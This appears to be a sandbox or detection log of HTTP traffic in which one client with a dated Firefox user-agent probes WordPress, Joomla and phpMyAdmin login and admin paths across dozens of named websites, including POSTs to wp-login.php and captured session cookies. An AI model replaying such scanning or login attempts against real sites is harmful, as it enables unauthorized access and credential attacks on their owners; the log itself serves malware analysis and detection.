Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.grantstech.io/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipCookie: ff59ae34f86788aafc83adbd6fbb16ab=573a080441b430e46540f849b8105044User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.maxiv.lu.se/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://micro-design.com/administrator/
Source: global trafficHTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Fhimontessori.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://himontessori.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.ceuandalucia.es/administrator/
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: daisyokogyo.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /en/wp-login.php HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /saml/index.php?page=%2Fadministrator%2F HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: saudi-jamac.comAccept: */*Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: OF=3dbfg2bnrmlhvmjhpi48421sg2User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /concord/PhpMyAdmin/ HTTP/1.1Host: kidsrkids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: knu.ac.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.knu.ac.in/administrator/
Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6Ik9iRDZCclQ1UEJFcVRhU0M0Z2JWd0E9PSIsInZhbHVlIjoiLzhpMDY3eGRpRmFYNGZsVG5UN01DUGY3cGlYalNpc0lBVWhIc2o2VWlrQWRpV21uR01FVEJXSCszQTg5UTlDQk83RytmS296VWZQZGk4UGZlaE10QlpUa29sV3E5OG1rMzdZV2tNWEZscnUwK2k1NVpvR0hJOWswKzNPMTRXV3giLCJtYWMiOiJmZThhNzk4NzM0NGI2YWIwMzkzYzBiOGIzNTdkNjk5YTA2NDFlM2E0ZGY2ZGNkNTBmNTI4YTRkNDUzODhiMTMwIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6InNSUUdPSlJvRjI4SU9XL0o1aG5yTmc9PSIsInZhbHVlIjoiaDROU2VITEgzb3IwMm1QU1FWM0hlZE94NWVBMW4vSEczTlN3YTBWc3had20wWmljdkJ2RHdJRWk3SFk3UHhGTGh5Nis5dzl2UlVNSW40cU9wWG5sZ0lyVkc0eUg2a3BJbTd2VWZwZjBkdDBWNDcrbDBKTHBrazg5S3E5cHdlQXYiLCJtYWMiOiI4ZjljNzY5YTJmMjg3Nzg5ZDk1ZGRhZTk4YzBlNGVhNTVmZWM3NGE3M2FjNjM5NWMxNDhhNjU2ODU5NDdlNzZkIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IkI1ejVQMUpRYWxNcjgranNNVTBURFE9PSIsInZhbHVlIjoid3hpb3hCWENGcnU0M0ZDYktoTjAzMDQyOE8vZjRUUXJ2NjRuRzJ4Z0FtWitaNG00ckFqM0xzc1NHdWx5SGVwbzhPcldyUU5zK2hJMGVHUXlYQjBHcnM2WXVYUEZIS2hPKzA5UDl5dEoyRzUvYmkveVoxcHBJcmo5MVI3M0xjeUkiLCJtYWMiOiJiNDcwN2IyNzZjYzUyMzhmOTAyMzQ2ZmEwMjM0MTMwZmUzN2Y4ZTczNThjZmZiZGQ1NGU0MTcyN2Y3MTZiYWY0IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eco-landeck.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rech.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6Imo1aVN2WVJmWnBrNnZqSXJrYXFoblE9PSIsInZhbHVlIjoidVNWYlV1bDRTdmFsRnQ0anV4Zy9kK3RTUXdEQVFwV1I5OXo1Z0hKUTBWbWxoeFNDUGEwM3F0d1Y2d29pZFZoZm5GQUloWURIUW1SRUo0aHQ5Ry8xTEhUejRwYndPNVlGSDdtbXZMUkxVbjcwNmxQTVpKSnV1dVZsQ3B5ajZnOTkiLCJtYWMiOiJjZWU3NTQ4MWIwNzUyNDE5MDQ3NWZjNGY3YjYwMWJiZjMwNzk4ZDZmOGU2ZjFhYTNkNzA5N2RkOTgwNzBlMmJiIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6InZhbDJwVnlLUWhubGJIVTRxS1RyS3c9PSIsInZhbHVlIjoibEtHV0dCVjhVZFFxdXVPckRoandqSmJIM2VpRWo3WkE2ejZGY2pQbU5MVDEyaUwxT3czZzd6T2tYUFc2WjNmYm83eGJpaCtkTnU2eW1zMmcxN3N5eHJlbjdPL1drOGwyOUw5TjhsM0k1MnBoWDhYOHJucU5VWGN6Z3lZOC9qejUiLCJtYWMiOiJkYmI0NTNiNTQ5YzNhYzUxNjUyMDM2MWNlM2QzYzYxNGMyZTJhMWY2MzYyYWNiN2JjNzQ2ODI5NzJlMjU2MGQ0IiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IkxXaFVUaFNtTzd2ZGkvek9mQ0hvQmc9PSIsInZhbHVlIjoiZmhtK2lrVUlvZjdVZHpFVWVmMjR6b0VFRVYwWWdxaXNkRmpTQ202R0hubjNUM2czRThCblFXTXNOVjhQNC9kdS8yMmhialBBNGtpcW05eDZ0NDJzMGFDZ2VUemRuU2dvU01pdUNUdGEwc0wvUFRqdUt3MFl6RFlkblFaTWhZQy8iLCJtYWMiOiI2ZTM3MmEwZmUyNWQ5ZDgyYTFhNWQwMDg4OWNkNTdlNmI5ZDJhZmM1MzcwMzM3NDgxZjBlNDI5MTllNTVlN2VjIiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://www.gatewaytoearlylearning.com/administrator
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.bunasta.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: wonka.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gruporegiosafety.com/administrator/
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://jamiesonmullin.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://ce-logic.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.grantstech.io/administrator/
Source: global trafficHTTP traffic detected: GET /wp-admin HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.linkan-group.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-admin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.2brospw.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /en/wp-admin HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.dstaq.com/en/wp-login.php
Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipCookie: site_version_phase=108; site_version=HDv3User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.hugedomains.com/domain_profile.cfm?d=robinsonland.com
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://webstamp.ca/wp-login.php
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP+Cookie+checkUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://samson.pe/wp-login.phpContent-Length: 141Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: POST /wp-login.php HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipCookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=7mfvhmb4mfea9682fccpeuhhfbUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://coralparkchristian.org/wp-login.phpContent-Length: 140Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.knu.ac.inAccept: */*Accept-Encoding: deflate, gzipCookie: laravel_session=eyJpdiI6IldVSVdPNGdUR2JDN2tFR2tvcjMzVXc9PSIsInZhbHVlIjoiR29jOElPY2pHK2ZKdjF3WnkwSWljS0sxNjMyc3Rrb3RZM0hsRHU0ZU1HN05jaEV6UVQyL2RLajNSV0VZYllpU2VObUhVVEdQVDE5OHRHUlZ1czZtOWozL0FJSUNFOTFTM255UW5tbzJ2MVhrdnp3VWgrUS9abDhpN1VkSW1SdDQiLCJtYWMiOiI1NmYxZWE0YTI5ZmE1NzcxMGY4NjhmMGJkZDFlOTcyZWNiYTIyMWQ0Nzk1N2RhMzgyYzNjYjhjMzMxOTIxMjM3In0%3D; XSRF-TOKEN=eyJpdiI6IkFPalpTRG5rdmUxUmNpVVMyVW9VL0E9PSIsInZhbHVlIjoiVmN5VjBEN0doZmxEdWNNOXh2RVFoUzNjb0pHcEdNZDZ2ay9zaWladjB5bmtoMk5HcTloeWZBb0p0aXBnK2kvQTVrOHpkOW8yelBQTmYzZDN0bWQwNnFnZENVTXN5OVBIdnJwYk9TTGpCa1o5TXZaMWZkZ1ZtdXIwcXdhMjFmZlQiLCJtYWMiOiI5OGQyNjEwOGYxMmJlNjUzZDYxZTEyMjM3ZjEzMWJkM2E0NjU0NzE5MzYyYjAyMTA5ZmY5MGY3NDZkNmI4NTk1In0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.knu.ac.in/administrator/
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://unaj.edu.pe/wp-login.php
Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=22cb6f4364865b2e22019c7dac43ae73|11f187638643e13d7bd1963991fac52b; OF=3dbfg2bnrmlhvmjhpi48421sg2User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.beachrecruitment.com/administrator/
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: edgewater.groupAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: belongfbg.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=O9GVX4jId9RJuNoELP6FOmLes7L1Dv_lQ.oZC7Kt.D0-1700978377959-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=8ce644f91f3f0aa94249a98a8e2141b0|11f187638643e13d7bd1963991fac52b; OF=ggr72avlfjvqinhaol7mprbv57User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: integraledu.hrAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=8257809a7475c7fa7752a0e86fe7cff7User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=R0qqCwK.17oONu7RjBLPHjggdQkWTgT9UHD8GB3iYHI-1700978378407-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: bunasta.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.bunasta.eu/administrator/
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eco-landeck.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.rech.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: saudi-jamac.comAccept: */*Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
